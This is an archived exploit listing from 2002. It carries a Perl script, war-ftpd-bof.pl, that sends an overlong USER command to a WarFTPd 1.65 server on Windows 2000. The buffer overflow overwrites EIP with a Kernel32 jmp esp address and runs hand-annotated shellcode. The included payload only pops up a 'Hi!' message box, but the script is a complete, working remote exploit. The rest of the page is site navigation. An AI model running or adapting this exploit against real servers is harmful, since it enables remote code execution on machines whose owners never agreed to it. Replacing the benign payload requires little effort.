war-ftpd-bof.pl

war-ftpd-bof.pl: Posted May 29, 2002; Authored by Kago; WarFTPd v1.65 for Win2k remote buffer overflow exploit in win32 perl. Included shellcode pops up a message box.; tags | exploit, remote, overflow, perl, shellcode; systems | windows; SHA-256 | 4d51ac1438509a6db6d42e889b5f2204a336e230d13d61319f50f9395026bad2; Download | Favorite | View

war-ftpd-bof.pl

use IO::Socket;
$port=21;
$|=1;

             #Kernel32  jmp esp    7754a3ab
        #Kernel32  MessageBoxA  77e375d5
        #MSVCRT     c_exit    78003985
        

print "\tRemote Buffer overflow of user in WarFTPd 1.65 for Win2k\n\n\tBy kago\@kago.ca\n\n";
print "\tEnter The Target IP :";

$ip = <STDIN>;
chomp $ip;



  $host = inet_aton($ip);
            $ServerAddr = sockaddr_in($port, $host);
        $protocol_name = "tcp";
            socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
            select(CLIENT); $|=1; select(STDOUT);
        if(connect(CLIENT, $ServerAddr)) {
        send(CLIENT,"user ",0);
        
        send(CLIENT,"\x90"x485,0);            #485 nops to overwrite EIP
        send(CLIENT,"\xab\xa3\x54\x77",0);     #Overwriting EIP with "jmp,esp" address via Kernel32.dll
        send(CLIENT,"\x90"x5,0);          #some NOPs for padding- the "call,esp" steps to the last nop at 0098fd9c
        
        send(CLIENT,"\x55",0);            #push ebp - starting something new
        send(CLIENT,"\x8b\xec",0);          #mov ebp,esp
        send(CLIENT,"\x33\xff",0);          #xor edi,edi - edi = 0
        send(CLIENT,"\x57",0);            #push edi 
                
        send(CLIENT,"\xc6\x45\xfc\x48",0);      #mov byte ptr [ebp-0x4],0x6f - H
        send(CLIENT,"\xc6\x45\xfd\x69",0);      #mov byte ptr [ebp-0x3],0x78 - i
        send(CLIENT,"\xc6\x45\xfe\x21",0);      #mov byte ptr [ebp-0x2],0x21 - !
        
        
        send(CLIENT,"\xba\xd5\x75\xe3\x77",0);    #mov edx, 0x77e375d5 - MessageBoxA to edx
        send(CLIENT,"\x52",0);            #push edx
        send(CLIENT,"\x57",0);            #push edi
        send(CLIENT,"\x8d\x55\xfc",0);        #lea edx,[ebp-0x4] - move Hi! to edx
        send(CLIENT,"\x52",0);            #push edx
        send(CLIENT,"\x52",0);            #push edx
        send(CLIENT,"\x52",0);            #push edx
      
        send(CLIENT,"\x57",0);            #push edi
        send(CLIENT,"\xff\x55\xf8",0);        #call dword ptr [ebp-0x8]
        send(CLIENT,"\x55",0);            #push ebp - Start the exit stuff so we don't crash
        send(CLIENT,"\x8b\xec",0);          #move ebp,esp
        send(CLIENT,"\xba\x86\x41\x01\x89",0);    #mov edx, 0x89014186 - To exit we need to call exit at 78003985 from MSVCRT but we can't use Nulls
        send(CLIENT,"\x81\xea\x01\x08\x01\x11",0);  #sub edx, 0x11010201 - My leet-o way to get to the address with the null
        send(CLIENT,"\x52",0);            #push edx
        send(CLIENT,"\x33\xc0",0);          #xor eax,eax
        send(CLIENT,"\x50",0);            #push eax
        send(CLIENT,"\xff\x55\xfc",0);        #call dword ptr [ebp-0x4]
        
        send(CLIENT,"\n",0);
        
        close(CLIENT);
  
  }

Top Authors In Last 30 Days

Red Hat 220 files
indoushka 88 files
Ubuntu 84 files
Gentoo 36 files
Jasper Nota 25 files
Debian 20 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,098)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,715)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,486)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,742)
UNIX (9,435)
UnixWare (187)
Windows (6,672)
Other

war-ftpd-bof.pl

war-ftpd-bof.pl

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

war-ftpd-bof.pl

Share This

war-ftpd-bof.pl

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems